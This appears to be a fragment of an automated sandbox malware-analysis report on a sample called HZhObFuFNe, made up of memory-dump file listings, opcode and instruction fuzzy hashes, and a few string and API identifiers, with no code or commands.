                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5527c1b381572e5660f7bc415841c8ebfb08e296a718bad118c7e7979c8e0273
                                                            • Instruction ID: 55187b529a1a0e39926a2bc19897589e590f36254efa47eb2b679223cd8d372d
                                                            • Opcode Fuzzy Hash: 5527c1b381572e5660f7bc415841c8ebfb08e296a718bad118c7e7979c8e0273
                                                            • Instruction Fuzzy Hash: 34616873D087908BEB118F28C8806697BA2AFC6314F29836EFCD55B397E7749A41D741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf2bff278a6482bce56acd302a890166dd29539d0690671001eedb038755a2d4
                                                            • Instruction ID: 70044a9591697e2b2ab158f4230900ae09ff2a468617290e68e859050abb6716
                                                            • Opcode Fuzzy Hash: cf2bff278a6482bce56acd302a890166dd29539d0690671001eedb038755a2d4
                                                            • Instruction Fuzzy Hash: 85411173F206290BE35C99299CA922A72C297C4310F4A463CEA92C73C2EC74ED1693C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1486549311.0000000001DC8000.00000004.00000020.00020000.00000000.sdmp, Offset: 01DC8000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_1dc8000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $ $ $0 $0 $`+$`+$`+
                                                            • API String ID: 0-1246032107
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [
                                                            • API String ID: 0-784033777
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: islower
                                                            • String ID: $
                                                            • API String ID: 3326879001-3993045852